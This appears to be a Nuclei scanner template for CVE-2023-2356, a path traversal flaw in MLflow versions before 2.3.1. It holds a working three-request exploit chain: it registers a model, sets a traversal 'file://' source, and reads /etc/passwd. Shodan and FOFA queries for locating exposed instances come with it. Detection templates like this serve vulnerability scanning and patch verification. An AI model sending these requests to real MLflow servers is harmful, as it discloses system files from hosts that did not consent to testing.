id: CVE-2023-2356 info: name: Mlflow <2.3.0 - Local File Inclusion author: Co5mos severity: high description: | Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. reference: - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-2356 cwe-id: CWE-23 metadata: fofa-query: app="MLflow" max-request: 3 shodan-query: http.title:"mlflow" verified: "true" tags: cve,cve2023,lfi,huntr,mlflow,oss variables: str: "{{rand_base(6)}}" http: - raw: - | POST /api/2.0/mlflow/registered-models/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{str}}"} - | POST /api/2.0/mlflow/model-versions/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} - | GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 extractors: - type: regex part: body name: version internal: true group: 1 regex: - '"version": "([0-9.]+)",'